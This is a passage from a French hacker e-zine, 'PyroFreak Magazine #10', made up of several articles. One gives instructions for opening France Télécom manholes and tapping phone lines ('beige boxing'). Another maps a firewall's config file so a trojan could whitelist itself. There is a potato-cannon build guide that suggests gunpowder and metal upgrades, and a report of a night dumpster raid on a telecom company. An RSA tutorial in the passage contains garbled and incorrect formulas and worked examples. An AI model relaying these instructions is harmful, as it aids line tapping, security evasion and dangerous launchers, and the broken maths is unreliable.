pas la clé du bonheur ? J'espère vous avoir convaincu que lorsqu'il s'agit de
modem, cette affirmation est vraie...



____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 13-Beige Boxing - Que se cache t'il sous les plaques
| FUCK TELECOM (Pour les Français)
|(X) Phreak ( ) Hack ( ) Autres
'.__________Par Cyberdollar ________ cyberdollar@caramail.com ______ ___


Ce sont des plaques de métal de meme type que les plaques d'egouts qui
mesurent environ 40x60 cm mais parfois ce sont des plaques beaucoup plus
grandes (60x100) mais un moyen infaillible de les reconnaitre elles ont le
logo de Fuck Telecom !!


a)OU LES TROUVER ?
On n'en trouve pas n'importe ou !! Si vous vous trouvez dans une rue et que
vous vous voulez savoir immédiatement s'il y a des plaques FT dans cette rue
: regardez en l'air : si vous voyez des cables en l'air alors vous n'en
trouverez pas dans cette rue, si aucun poteau ou/et aucunes lignes ne sont
suspendues en l'air alors vous trouverez trés certainement une/des plaque(s)
FT dans cette rue : en effet s'il y a des plaques par terre ca veut dire que
le réseau des lignes téléphoniques de FT est souterrain contrairement aux
endroits ou vous verrez des lignes suspendues en l'air... je vous conseille
de regarder dans les rues principales car ce sont les grandes rues dans
lesquelles FT met les les cables sous terre, meme dans les petites villes
(environ 3000 hab.) il y a les lignes sous terre mais uniquement dans la/les
rue(s) principale(s) !!


b)QUE SE CACHE-T-IL DESSOUS ?
Avant de soulever plusieurs de ces plaques je m'attendaient a tomber sur un
véritable réseau ou fils & cables s'emméleraient et je m'attendais meme à ne
pas pouvoir m'y retrouver, mais une nuit à 3h00 du matin dans un petit coin
tranquille, lampe à la main, j'allais bientôt trouver la réponse à tous mes
problèmes.......

Je soulevais donc la plaque : il y a quatre trous dans les plaques si vous
êtes seuls faites comme moi, passez un cable dans le premier trou faites le
ressortir dans le deuxième, rentrer le dans le troisième, sortez-le du
quatrieme et faites un noeud, de cette manière vous éviterez de faire trop de
bruit et en beige-boxing un peu de bruit = beaucoup d'ennuis !!

Si vous etes 2 mettez un doigt chacun dans chaque trou et soulevez mais je
vous préviens : vous allez en chier !!

Voilà, une fois le "
coffre" ouvert je comtemplais le trésor, et là à ma
grande surprise : il n'y a qu'un ou 2 fils !! Je le dénude délicatement et là
une petite dizaine de fils de toutes les couleurs s'entremelaient : je repère
le bleu, puis le blanc : je les dénude branche mon tél et ses pinces crocos
et là BINGO : j'ai la tonalité !!

Voilà tout ceci juste pour vous dire qu'avec le réseau souterrain de FT plus
besoin de défoncer les boitiers ni de grimper en haut des potaux pour se
faire un peu de BEIGE-BOXING !!

Faites-gaffe quand même !!

____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 14-Encryption RSA
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Sabrina ____ ________ sabrina@inorbit.com ______ ___





TCS - 2000

Créé par Sabrina

KERCKHOFFS:"
Il ne faut pas compter dans un cryptosystème dont la
résistance réside dans le fait que l'ennemi ne sache pas comment
fonctionne l'algorithme."



CRYPTOSYSTEME - RSA

I- PRESENTATION DU RSA

II- ALGORITHME DE CRYPTAGE RSA

1- Principe fondamental

2- Calcul d'un triplé ( N , C , D )

3- Algorithme

III- RSA EN PRATIQUE

IV- CASSER LE RSA

1- Comment casser le RSA

2- Casser le RSA en utilisant les protocoles de communication: Partage
du module

3 Cassage du RSA par factorisation du module N

Méthode du crible quadratique

V- CONCLUSION SUR LE RSA

ANNEXE MATHEMATIQUES



=======================================================================




I - PRESENTATION DU RSA



La cryptographie à clé publique fut créée par Diffie et Hellman, et
indépendamment par Merkle. L'originalité de cette découverte réside dans
l'existence de 2 clés: l'une pour crypter le message et la seconde pour le
décrypter. Les algorithmes qui en découlèrent furent soit impraticables
(trop lent), soit trop gourmand en place (le message codé était beaucoup
plus grand que le message initial). Le premier algorithme intéressant fut
celui de Merkle (algorithme à empilement) mais le RSA resta (et reste) le
seul algorithme de cryptage vraiment sûr et utilisable.

Le RSA est le plus connu des algorithmes à clé publique. Il est aussi bien
utilisé dans le chiffrement de données que dans les signatures
numériques. Inventé par Ron Rivest, Adi Shamir et Leonard Adleman, le RSA
résiste depuis plusieurs dizaines d'années à toutes les méthodes
de cryptanalyse ; même en prenant en compte la puissance gigantesque
développée par les ordinateurs actuels. Sa sécurité est contenue dans
la difficulté à factoriser les grands nombres. En effet, il n'existe
pas d'algorithme performant pour factoriser de tels nombres.



II- ALGORITHME DE CRYPTAGE RSA

1- Principe fondamental



Le RSA est un cryptosystème à clé publique. Il y a en tous 3 clés. La
première est appelée clé publique N, elle est connue de tous et est
divulguée librement. La seconde est la clé de cryptage C ; celle-ci est
gardée secrète par l'expéditeur du message. Elle ne doit donc pas être
divulguée. Enfin, on a la clé de décryptage D ; elle aussi gardé secrète,
cette fois par le destinataire.

La combinaison des clés N et C permet de crypter le message. Tandis que la
combinaison de clé D et N permet de décrypter le message.


=============
Image1.gif
=============



L'avantage d'un tel système est que même connaissant une partie des données
du problème (c'est-à-dire ici N), on ne peut décoder ce message.
Mais comme nous le verrons par la suite, il existe des techniques qui
connaissant N permettent de retrouver C et D.



2- Calcul d'un triplé ( N , C , D )



Il est conseillé d'avoir quelques notions en arithmétique avant de lire ce
paragraphe. Ci-joint une annexe mathématique rappelant les points principaux
pour comprendre le RSA.


Soit p et q deux nombres premiers de grande taille (plusieurs centaines de
chiffre en base 10). Au plus ces nombres seront grands au plus votre
cryptage sera fiable ; en contrepartie, le codage sera lent.


N la clé publique vaut le produit p*q.

C la clé de cryptage est choisie tel que C et (p-1)*(q-1) soient premiers
entre eux.

D la clé de décryptage est choisit tel que D = C-1 MOD (p-1)(q-1)

On obtient ainsi un triplé solution. On remarquera que la donnée de p et q
permet de retrouver entièrement la clé de cryptage C et de décryptage
D. Pour casser un cryptage RSA, il suffira donc de retrouver p et q à partir
de N (ce qui comme prévu dans l'introduction reviens à factoriser N).
Mais nous reviendrons sur ce point dans la section IV- 3.




Exemple: Recherche d'un triplet solution

On prend p et q deux nombres premiers: p = 53 et q = 17. On se
restreint ici à des nombres de petite taille pour avoir des calculs
simples. On obtient donc d'après les explications précédentes: N = p*q = 901

On choisit la clé de cryptage C pour que C soit premier avec (p-1)*(q-
1). On peut prendre (le choix reste assez arbitraire) C = 83.
Enfin, le calcul de D s'obtient en calculant la solution de C = 83-1
mod 901 = 411. Attention ! En apparence les calculs peuvent sembler simple
mais la programmation de générateur de clé nécessite de subtils algorithmes
(cf Fin de l'Annexe). On obtient donc le triplé ( N , C , D ) = ( 901 , 83 ,
411 ).



3- Algorithme



Si on considère un fichier informatique c:\command.com par exemple. Ce
fichier est, informatiquement parlant, représenté par une suite d'octet.
Or, chaque octet représente (dixit la table ASCII étendu) un numéro compris
entre 0 et 255. On peut donc, en juxtaposant tous les octets du
fichier, dire que c:\command.com est un nombre M (de très grande taille).


On va tout d'abord séparer M en une succession d'entier Mi , tous plus petit
que N:



==========
Image2.gif
==========



Cette hypothèse (Mi plus petit ou égal à N) est TRES importante ; le RSA ne
fonctionnera pas sinon. On peut maintenant appliquer l'algorithme de
cryptage RSA sur chacun de ces entiers Mi.



==========
Image3.gif
==========




On crypte bien M1 par les clés ( N , C ) et on décrypte W1 par les clés ( N
, D ). On retrouve ainsi le schéma du cryptosystème à clé publique
évoqué dans la présentation. On remarque que W1 est inférieur ou égal à N
(dût au calcul modulo N) ; le fichier crypté sera de même taille que le
fichier en clair. Cette remarque prend toute son importance dans la
pratique. On peut aussi remarquer que le codage du fichier se fait par Bloc
de taille de longueur de N.



Exemples: Cryptons le message M précédent par le triplet trouvé en 1-

( N , C , D ) = ( 901 , 83 , 411 ) et M = 330564019

Cryptage:

M1C mod N = 3 = W1

M2C mod N = 469 = W2

M3C mod N = 8 = W

D'où W = W1-W2-W3 = 003469008 ( donnée cryptée )

Décryptage:

W1D mod N = 330 = M1

W2D mod N = 564 = M2

W3D mod N = 19 = M3

On retrouve le message M = M1-M2-M3 = 330564019



III- RSA EN PRATIQUE



Dans la pratique, plusieurs utilisateurs possèdent soit la clé C, soit la
clé D. Comme vous l'avez sans doute remarqué, C et D joue des rôles
totalement symétriques. Si bien que certains utilisateurs pourront utiliser
D pour crypter leur message et d'autre pourront utiliser C pour le
décrypter ...et vice versa.




==========
Image4.gif
==========



Par exemple, l'utilisateur 1 pourra envoyer et recevoir des messages des
utilisateurs 2, 4 et 5. Tandis que l'utilisateur 2 pourra envoyer et
recevoir des messages des utilisateurs 1, 5 et 6. Il y a donc bien un
partage des clés. Bien sûr, un tel système s'appuie sur la confiance des
utilisateurs avec lesquels les clés sont partagées (problème de
certification). Par ailleurs, la clé N est connu de tous, même de vous. Un
tel système justifie bien le fait que C et D sont appelés souvent clé privé…




IV- CASSER LE RSA

1- Comment casser le RSA



Si le RSA est encore actuellement utilisé pour crypté des données très
importantes (cartes bancaires, compte en banques, virement boursier,
Microsoft Windows, netscape..), c'est parce qu'avant tout, il est très
difficile de le casser. Il existe cependant 2 grandes méthodes de cassage du
RSA. La première est celle qui consiste à utiliser les 'vices de formes' des
protocoles de transmission d'information (il faut garder à l'idée que le
RSA nécessite 3 clés ; on peut utiliser certaines astuces, par combinaison
des clés, pour obtenir notre message en clair). La seconde méthode
est d'utiliser notre seule hypothèse de départ: N. Pour des raisons qui
viendrons d'elles même, nous nommerons ces algorithmes: attaque brut
(par analogie aux attaques brutes force sur serveur ftp ;)




2- Casser le RSA en utilisant les protocoles de communication: Partage du
module



Si l'on reprend la méthode de génération des clés, il est facile de voir que
pour une même clé publique N ; il peut y avoir plusieurs clé privé C et
D. L'attaque suivante est valable lorsque vous connaissez N, C1 et C2, où C1
et C2 représentent 2 clé privées basées sur le même module N.
C'est-à-dire que les clés C1 et C2 ont étaient créé à partir du même nombre
N.

On suppose ensuite que le message M clair a été crypté avec la clé C1 et
avec la clé C2. On obtient 2 messages cryptés W1 et W2.

W1 = MC1 mod N

W2 = MC2 mod N

On peut maintenant très facilement décrypter le message M initial. Pour
cela, il suffit de trouver deux nombre a et b tel que:

a*C1 + b*C2 = 1

On peut toujours supposer que a < 0 (sinon b l'est), on obtient dans ce cas:
(W1-1)-a*W2s = M mod N et on récupère donc le message en clair M.

Le cassage du RSA est presque immédiat s'il y a un partage des clés entre
utilisateur. Il existe d'autres méthodes de cassage du RSA par
utilisation du protocole de transmission des clés, mais comme vous le voyez
ces méthodes utilisent des hypothèses très fortes ! Et souvent ceux
qui utilisent le RSA en connaissent les failles. C'est là qu'interviennent
les autres méthodes d'attaque brut du RSA.



3 Cassage du RSA par factorisation du module N



Imaginons que l'on est récupéré le message W1 crypté par écoutes de la ligne
ou par vol du fichier crypté. Les clés de cryptage C et D ont été
trouvé exclusivement à partir de p et q. On rappelle que N = p * q. Or,
comme l'on connais N, il suffit donc de factoriser N pour récupérer les
nombres p et q. La sécurité du RSA réside donc exclusivement dans le fait de
pouvoir factoriser N.

On pourrait dans un premier temps penser que factoriser N est une chose
facile, car finalement, il suffit de tester (N divise A) pour toutes les
valeurs de A comprises entre 1 et N (on peut même dire que A doit être
premier :). Mais le nombre N est, comme nous l'avons annoncé dans la
II-2, d'une taille de plusieurs centaines de chiffres: aucuns ordinateur
actuel n'est assez puissant pour calculer les divisons successives de N en
un temps raisonnable. Cette méthode d'attaque brut prendrait plusieurs
siècles !!! Malgré les connaissances actuelles il n'existe pas de
d'algorithme permettant de factoriser N facilement…..c'est d'ailleurs ce qui
fait toute la force du RSA..

Le RSA est incassable ?

Bien sûr que non ! Les cryptanalystes ont trouvé des méthodes permettant de
factoriser N en un temps relativement raisonnable. On va étudier
ici une des ces méthodes. Mais il faut savoir avant tout que des telles
méthodes de factorisation nécessite une excellente maîtrise des langages
de programmation car la moindre ligne de code gagné se paie par un temps de
calcul parfois divisé par 2. Il faut aussi savoir que casser une clé
RSA de 100 chiffres emploie une énorme quantité de calcul, il faut donc
plusieurs ordinateurs très puissants.

Il existe actuellement 2 grandes méthodes de factorisation de N: la méthode
des courbes elliptiques et celle du crible quadratique. La première
est résolument la plus difficile d'accès, c'est pourquoi nous allons étudier
la seconde méthode…



Méthode du crible quadratique



La méthode est basé sur l'idée très simple suivante. On suppose connu X et Y
tel que

N divise X² - Y² = ( X-Y ) * ( X+Y )

On sait que N peut se factoriser sous la forme p*q. Donc, p et q divise N.
Pour des raisons mathématiques (évidentes ?), on a p qui divise (X-Y)
ou (X+Y). Finalement, on cherche à calculer le plus grand diviseur commun de
(N et X-Y) ou (N et X+Y). Ce qui revient à utiliser l'algorithme
d'Euclide du calcul d'un pgcd (plus grand diviseur commun).



COMMENT DETERMINER X ET Y

Pour commencer, on détermine une suite de carrée (an²) tel que

|N-an²| < d avec d un entier raisonnable

Par ailleurs, en utilisant l'unicité du développement d'un nombre en facteur
de nombre premier, on suppose connu des nombres premiers pi tel
que:

|N-an²|=P (pini) où pi est un 'petit' nombre premier


(on entend par petit un nombre qui est parfaitement connu de la machine)

Ainsi, on peut toujours supposer pour simplifier que l'on dispose de a1, a2
et a3 tel que:

N-a1²=p1n11*p2n21*p3n31

N-a2²=p1n12*p2n22*p3n32

N-a3²=p1n13*p2n23*p3n33

Maintenant, on recherche alors l 1, l 2 et l 3 tel que (N-a1²)l1*(N-
a2²)l2*(N-a3²)l3=a ²

Il s'agit en fait de résoudre :

l 1 n11+l 2 n12+l 3 n13=0 mod 2

l 1 n21+l 2 n22+l 3 n23=0 mod 2 (problème de résolution de système dont on
sait trouver des solutions)

l 1 n31+l 2 n32+l 3 n33=0 mod 2

on trouve donc les solutions: l 1=... ; l 2=... ; l 3=... tel que (N-
a1²)l1*(N-a2²)l2*(N-a3²)l3=a ²

puis en utilisant les calculs de modulo on obtient: (a1l1*a2l1*a3l1)² = a ²
mod N

finalement en posant, X = a et Y = a1l1*a2l1*a3l1 on retrouve alors Y²-X²=0
mod N

On a donc trouver X et Y pour que N | Y²-X²



COMMENT DETERMINER LES pi ET ai ?

On se fixe tout d'abord une base de facteurs premiers {p1=2, p2=3, p3=5,
p4=7, ...}. Ces entiers sont considérés comme des nombres premiers
'simples'. C'est-à-dire qu'ils sont par exemples calculables ou contenus
dans une base de donnée. On peut décrire la recherche des entiers pi et
ai par l'algorithme suivant:

· On calcul : m=E( racine(N) ) ; on peut alors calculer les ai=(m+i) dont le
carré est voisin de N.

|N-an²| < d

· On fixe c ( le crible ) un entier naturel. On calcul le résidu R avec

R=N-(m+i)² et on fait varier i dans des valeurs entières de -c à +c

· On divise (tant que c'est possible) R par p1, p2,... pour obtenir une
factorisation de R.

On obtient une égalité du type recherché : N-a1²=p1n11*p2n21*p3n31*...

On pourrait croire que l'on factorise des nombres de grandes tailles en
cherchant à factoriser N-a1². Mais en fait, il faut bien voir que les
nombres manipulés sont de l'ordre de racine(N) donc 2 fois plus petit (au
niveau de la taille :) que N !



V- CONCLUSION SUR LE RSA



On comprend mieux pourquoi le RSA est l'un des algorithmes de cryptage les
plus sûr au monde. Il est relativement facile à implémenter, tandis
que les "
casseurs de RSA" sont quant à eux très coûteux et très délicats à
coder. Par exemple, casser une clé de 140 a nécessité 200 ordinateurs
fonctionnant en parallèle durant 4 semaines pour poser les systèmes
d'équations (celui des l précédent) et 100 heures de calculs sur un CRAY
pour les résoudre. Les créateurs du RSA ont toujours confiances en leur
cryptosytème. Il organise d'ailleurs un énorme concours de cassage du
RSA. Le but est de trouver les éléments constitutifs du RSA ( p et q ) à
partir de N. Actuellement (début 2000), on cherche à casser le RSA-155,
c'est-à-dire à 155 chiffres. Les responsables du RSA Data Security
recommandent d'utiliser des clés de plus en plus grandes car l'avancés des
technologies et des algorithmes permet de diminuer de jour en jour la durée
de vie des clés existantes. Ces même responsables mettent en garde
les industriels contre qui de grands groupes financiers ou organisation (NSA
en première ligne...) auraient les moyens de construire des
'super-calculateurs' pour décrypter les données sensibles.


RSA-155 constitue une véritable étape dans la cryptographie. Car codé en 512
bits, le RSA-155 est véritablement utilisé par les banques... Le
cassage du RSA 155 remettra en cause la plus part des méthodes de cryptage
des organismes. On estime à quelques mois le cassage du RSA
155. On sait hors et déjà que le prochain challenge sera le RSA-160.

Exemple de machine "
casseuse de RSA":

TWINKLE (créé en 1999) est le nom donné à la machine censé aidé la
factorisation des nombres premiers. Son créateur est Adi
Shamir, il estime sa puissance de calcul équivalente à 1000 Pc actuel
(pour un coût de 30 000 Frs). Cette machine serait capable de
casser des clés publiques de 512 bits (TWINKLE travaille à 10 GHz).

Le principe de cassage de cette machine consiste à trouver l'inverse
d'un calcul modulaire. On a vu que W = MC mod N. Elle cherche des solutions
de calcul de racine C-ième de W. C'est-à-dire les solutions envisageables de
W-C = M mod N. Une tel méthode permettrai de factoriser un RSA-140 en
environ 10 jours (d'après les créateurs) et un RSA-155 en à peine 10
semaines....

Voici à titre illustratif les prédictions d'une telle machine en
ressource mémoire (chiffres pris de www.rsa.com)

Taille de la clé

(en bits)
Nombre de facteurs premiers
déjà connue
Mémoire utilisé
Mémoire lié
aux équations
428
600 ko
14 Mo
128 Mo
465
1.2 Mo
64 Mo
825 Mo
512
3 Mo
128 Mo
2 Go
768
240 Mo
10 Go
160 Go
1024
7.5 Go
256 Go
10 To !






ANNEXE MATHEMATIQUES



Calcul Modulaire

A = B mod C équivaut à dire que B est le reste de la division euclidienne
de C par A. On lis A égale B modulo C.

10 = 2 mod 8 car 10 = 1*8 + 2

6 = 0 mod 3 car 6 = 2*3 + 0



Nombres premiers et premiers en eux

Un nombre est premier s'il est divisible seulement par 1 et par lui même.
Les nombres premiers nous servent entre autres pour déterminer la clé
publique N.

7 est premier car divisible seulement par 1 et par lui même.

Deux nombres sont premiers entre eux si le seul diviseur commun entre eux
est 1. Cela permet de calculer la clé de cryptage C.

10 et 9 sont premiers entre eux. Car leurs seuls diviseurs commun est
1: 10 = 2 * 5 et 9 = 3 * 3.



Deux nombres premiers entre eux ne sont pas forcement premiers eux même !
Comme le montre l'exemple précédent: 10 et 9 sont premiers entre
eux sans être premiers.

REM: TOUT nombre entier est décomposable en produit de nombres premiers.

16473 = 3 * 17² * 19 (on dis que l'on a factorisé 16473)

8427 = 3 * 53²



Inverse Modulo

B = A-1 mod C reviens à trouvé un couple ( A , X ) tel que B*A + C*X = 1

Comme 3*4 - 1*11 = 1, on a donc 3 = 4-1 mod 1

Il existe un théorème qui dis que si A et B sont premiers entre eux alors
on peut trouver U et V tel que: A*U + B*V = 1. Cela est important pour
calculer la clé D de décryptage.



PGCD (plus grand diviseur commun)

Le pgcd représente le plus grand diviseur commun de deux nombre.

pgcd ( 5 , 15 ) = 5 car 15 = 3 * 5

pgcd ( 8 , 18 ) = 2 car 8 = 2 * 4 et 18 = 2 * 9



Algorithme d'Euclide

Il permet de résoudre l'équation d'inconnu ( X , Y ): X * A + Y * B = 1 dans
le cas où pgcd( A , B ) = 1 (c'est-à-dire les cas où A et B sont premiers
entre eux)

Si A = B mod C alors PGCD( A , B ) = PGCD ( B , C )

Résolution de X*123 + Y * 23 = 1

123 = 5 * 23 + 8 donc ici 125 = 8 mod 23

23 = 2 * 8 +7

8 = 1*7 + 1


d'où: 1 = 8 - 1 * 7 = 8 - 1* (23 - 2*8) = 3 * 8 - 23 = 3 * (123 - 5*23)
- 23 = 3 * 123 - 16 * 23

on a donc trouver une solution de l'équation: X*123 + Y * 23 = 1

Ces équations interviennent souvent pour le calcul de D, ou pour remonter
le calcul des clés N, D et C.



Optimisation du calcul modulaire

Cette section n'est destinée qu'à ceux qui voudraient implanter sur machine
le RSA. Etant donné que les nombres manipulés sont de très grandes tailles
(plusieurs centaines de chiffres). Il est impossible de représenter MC lors
du calcul de MC mod N. En effet, si M = 466345346434123423343463465645 et
C = 7876856745342352355645767856785634. Il est très maladroit de calculer
MC en multipliant M, C fois et ensuite de calculer le modulo ( le nombre MC
représente un nombre de 1033 chiffres, c'est-à-dire 1 million de milliard de
milliard d'octet....).

C'est pourquoi, on emploie plutôt une méthode qui permet de calculer d'un
coup MC mod N. Pour comprendre cette algorithme, il faut juste savoir que
si A = B mod C et X = Y mod C alors A*X = B*Y mod C.



Explication de l'algorithme de calcul de MC mod N

On décompose C en base 2 comme suivant C=S ( d i 2i ) avec d i =0 ou 1

Donc, MC=P Md i 2^i=Md 0 *(Md1)2*((Md2)2)2*(((Md3)2)2)2*...

On calcul successivement : a i=(Mdi)2^i mod N et on aura
alors MC=P (a i) mod N

Algorithme :

La variable r contient la valeur P (a i) ; calculer au fur et à mesure.

Tant que C>0

Si (C mod 2)=1

alors M*r mod N ® r {Calcul de M^2^2^2^... mod N}

C div 2 ® r {Décomposition de C en base 2}

M*M mod N ® M {Calcul de M^2 mod N}

Retourner r



version 1.2 - 2000

Pour toutes questions, commentaires, critiques, erreurs: sabrina@inorbit.com





____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 15-Autres éléments sur l'emetteur télé du #9
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Cyberdollar ________ cyberdollar@caramail.com ______ ___


Ayant trouvé l'article de Skywalker sur l'emetteur TV trés bon j'ai essayé
(Cyberdollar) d'ajouter ce que je connaissais également sur le sujet, disons
que c'est un complément sur l'article de Skywalker mais tout le mérite lui
revient !!


1) LES BRANCHEMENTS D'UNE PRISE PERITEL :
Ce truc ne sert pas à grand chose mais ce sont quelques-une de mes
connaissances des prises peritel :


,-------------------------------------------,
\ 20 18 16 14 12 10 08 06 04 02 |
\ |
| 19 17 15 13 11 09 07 05 03 01 |
'------------21---------------------------'


1 Sortie Audio Droite 2 Entrée Audio Droite
3 Sortie Audio Gauche 4 Masse Audio
5 Masse Bleu 6 Entrée Audio Gauche
7 Entrée Vidéo Bleu 8 Entrée Commutation lente ou status 16:9
9 Masse Vert 10 Non connecté
11 Entrée Vidéo Vert 12 non connecté
13 Entrée Vidéo Rouge 14 Masse commutation
15 Entrée Vidéo Rouge 16 Entrée Commutation rapide *
17 Masse Sortie Vidéo 18 Masse Entrée Vidéo
19 Sortie Vidéo 20 Entrée Vidéo
21 Masse commune du blindage

AUTRES FREQUENCES :
Il existe une autre frequence que Skywalker n'a pas mis dans sa liste...
C'est un emmetteur frontalier susceptible d'être recu à proximité de la
frontiére :
LUXEMBOURG : bande III (Contrairement à la bande U en France) TF1 : E7 - F2 : E21

Au passage.....faites gaffes : le risque zero n'existe pas !!


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 16-Le PATATOR
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Mastermind ________ anakin_vador@hotmail.com ______ ___


1-Introduction
Le patator est un canon en PVC projetant des pomme de terres ,œufs et
petits suisses dans un rayon de 100 mètres a l 'aide de butane , gaz
utilisé dans la plupart des aérosols (laque, déo…)

Le Patator a été présenté en 1998 par Thierry Lhermitte sur la chaîne câblée
COMEDIE.

Le Patator n' est nullement un objet coûteux et difficile a réaliser, sa
fabrication est tres simple et j'encourage quiconque a essayer. Son prix d'
a peu près 100 FF peut paraître cher mais la facilité d'utilisation et le
fun procuré en vaut largement la chandelle. Le patator est un sport voué a
se developper pour les prochains jeux olympiques il est très pratique (bien
que peu portable ) mais garanti une une grande utilité , de plus il est
presque incassable en raison du pvc solide le constituant.

2-Materiel a acheter en magasin de bricolage (batkor…)

-1 tube en pvc diamètre 100millimetre longu

  
fourneaux sont assez bien , mais la
« Rolls » des allumeurs reste l'allumeur de chaudière surpuissant. Les
avantages d'un allumeur puissant sont de pouvoir mettre de la rallonge
(allumer a 3 mètres c'est plus sécurisant !) et d'avoir une combustion
immédiate (pas de galère) . Pour introduire les électrodes de l'allumeur
on peut faire un trou de 9-10mm dans la chambre de combustion et
etancheifier a la patafix ou faire juste des petits trous pour laisser
passer les fils. Les électrodes d' allumage (endroit ou l étincelle se
produit ) sont 2 fils denudés ou l'électrode d' origine ou bien un
système constitué avec un « domino »(sucre) et 2 aiguilles.
Attention dans certain cas la pulvérisation de laque sur les électrodes
empêchent l étincelle de se produire.


4-Utilisation
découper la patate en l'enfonçant dans le canon (il peut être ajusté a
cet effet) la patate doit être bien ajustée :trop petite=pas
d'étanchéité ;trop grande = résistance a l'avancement , voire explosion
de la chambre ; la patate doit coulisser « gras » dans le canon.
Assembler le canon dans le réducteur. ouvrir le couvercle puis vaporiser
de l'aérosol dedans ( j' utilise de la laque pour cheveux bon marché)
sachant que le butane « coule » dans l'air. La pulvérisation doit durer
un peu moins de 2 secondes (3-4 pschit). Revisser rapidement. Durant les
premiers allumages je conseille d'allumer a distance (rallonge de fils )
sur un support fixe après un peu d expérience le tir sur l' épaule pourra
être envisagé L ' allumage peut ne pas bien marcher , vérifier l
étincelle et/ou mettre plus de gaz(une fois réglé le patator marche a
tout les coups). Le lancement est accompagné d 'un grand bruit la patate
vole très loin et peut se pulvériser contre un mur.


5-Optimisation
idées a développer pour optimiser le patator :
-allumeur puissant
-chambre de combustion avec plus de volume
-canon long (strié ?)
-meilleur carburant (poudre ??)
-patator en métal soudé (possibilité de mettre plus de pression)
-patator a propulsion magnétique (ensemble d electro aimants pour envoyer des objets métalliques a grande vitesse)

6-Conclusion
Voilà de quoi procurer de grandes heures d' amusement . vous pouvez m'
envoyer vos photos animations ainsi qu 'idées pour le develloppement du
patator (pourquoi pas un site sur le TUNING du patator). Si vous
souhaitez obtenir des photos conseils films numeriques MPEG ficuier
patator 3dsmax contactez moi

essayer de devellopper au mieux ce sport !!!!!

ANARCHY RULEZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ



____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 17-NetAppGuard
|( ) Phreak ( ) Hack (X) Autres
'.__________Par KAiAPhAS ____ ________ goth.goth@caramail.com ______ ___

Pour commencer, c'est un programme qui controle tous les programmes qui
ont un accès à internet afin de repérer les trojans plus facilement. On
peut le trouver sur www.jcrun.com.


*** Fichiers :

** C:\WINDOWS\NAGWIN.EXE
C'est le programme en lui même éxécuté automatiquement au
démarrage.

** C:\WINDOWS\NAGCFG.DAT
C'est les données concernant les progs acceptés et refusés,
c'est ce fichier qui nous interesse.


*** Base de registre :

** HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Clé : LoadNetAppGuard="c:\windows\nagwin.exe"

** HKEY_USERS\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
Clé : LoadNetAppGuard="c:\windows\nagwin.exe"


*** Données :

Le programme est limité à 100 programmes acceptés et 100 programmes
refusés. Chaque chemin est limité à 255 caractères.

** Programmes acceptés :
Ils sont dans les 25 premières lignes. il y en a un tous les 256
caractères et chaque ligne contient 1024 caractères ça fait donc
4 programmes par ligne. Ils sont séparés par des espaces.
* 1er caractère : correspond au code ASCII du nombre de
caractères de la chaine ki le suit et ki contient le chemin du
programme accepté.
* Chaine de caractères : elle contient le chemin du prog.
* Espaces vides : ils sont là pour combler afin d'avoir un bloc
de données bien ordonné qui fait toujours la même taille.

** Programmes refusés :
Ils sont positionnés exactement de la même manière que les
programmes acceptés mis à part le fait qu'il sont placés à
partir de la 26ème ligne.


Le but de ces infomations est de créer un trojan qui se registrerait
avant que le programme ne détecte la présence d'un protocol. La
difficulté est que le fichier nagcfg.dat est constement ouvert et qu'il
ne peut par conséquent pas être modifié à moins d'obliger le programme
à le fermer pendant un court instant... Avis aux programmeurs...


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 18-Trashing Report
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Endrix________ ________ lordendrix@hotmail.com_____ ___


! ! ! ! ! ! ! ! ! !
! !! ! ! ! ! !! ! ! ! ! !! ! !
! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !
!!!===================================!!!
! [Trashing Report] !!
!!===================================!!
!===================================!
!!Dans la nuit du 29-30* Février 2000!!
!==================================!
Document écrit par endrix-


Qui?: endrix-, Tekrebel, Vip0|a, System_exe, Kev0rkian
Destination?: #1, Luxembourg, #2, Cartier industriel à Hull, Vidéotron
Heure?: de 12h00pm à 2h30am


Bon, il est 11h00 et je dois aller au Vidéo Super Choix. J'attend, j'attend,
oh... Kevorkian arrive et j'embarque avec lui :) En arrivant au luxembourg à
Gatineau, il avait system_exe, tekrebel et vip qui nous attendais dehors so
après avoir fait les présentations, on est allé à l'intérieur et on a parlé
de tout et de rien. Cependant il avait un petit manque d'alcool qui a été
très rapidement comblé(prochain fois les boyz, on s'amène plus d'argent..).
Pas longtemps après, tout le monde est ami et les discussions s'en vienne de
plus en plus profonde, moi et tekrebel parlons de théorie pour notre cégep,
vip tant la tête de tout bord tout côté pour entendre TOUT!!! Kevorkian et
parle de tout et de rien aussi. Après avoir parcourus tout les sujets
possibles, nous partons tranquillement direction Cartier Industriel à Hull.
Cependant une chose manquait... ohh excusez, kevorkian vient de l'allumer...
Hey oui, encore une odeur d'herbe de jouvance pour nous redonner l'espoir de
trouver tout plein de belles choses :) Arrivé, nous regardons tranquillement
pour voir si personne est la, ou si les copz nous attendes pas(on sais
jamais).

On trouve une place pour stationner. Tout le monde sors, on prend nos lampes
de poches, on s'habille le plus noir possible(oui vip, ton manteau blanc est
trop évident). La marche commence... Nous passons par une place entre 2
immeubles qui donne aux trésors de vidéotron. Nous pensons à ou pourrait
être
les caméras, comment s'y prendre ou aller... Après quelque moment, moi et
Tekrebel décidons d'y aller. Alors on va ce réfugier en arrière des 2 vannes
à la protection tes lumières et caméras et les autres après suivent. Je vais
voir pour prendre un sac(en attendant, kevorkian, system_exe et tekrebel
font le guet et le vipola est resté en arrière pour le guet à distance avec
sont beau Cache-cou mit comme une tuque ROUGE!

Peut après je reviens disant qu'il faut que quelqu'un vienne avec moi parce
les sacs sont trop dans le fond et j'ai besoin d'une personne pour soulever
le couvercle en attendant que j'entre dans la poubelle et que je prend un
sac. Tekrebel ce porte volontaire pour venir avec moi m'aider voyeusement
